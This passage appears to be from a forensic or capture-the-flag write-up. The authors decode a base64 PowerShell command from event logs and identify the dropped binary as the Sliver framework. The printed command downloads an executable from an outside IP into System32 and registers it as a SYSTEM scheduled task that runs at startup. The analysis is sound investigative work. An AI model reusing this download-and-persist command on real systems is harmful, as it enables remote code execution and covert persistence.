For this step, we once again explored the base64-encoded commands in the powershell event logs. We find and decode this log:
$BINARY='C:\Windows\System32\update.exe';
$ProgressPreference = 'SilentlyContinue';
Invoke-WebRequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $BINARY;
schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest;
schtasks /run /tn "updates"
We found this binary still in Windows\System32, and put it on VirusTotal. We found that it was the sliver framework, and used the ip in the log.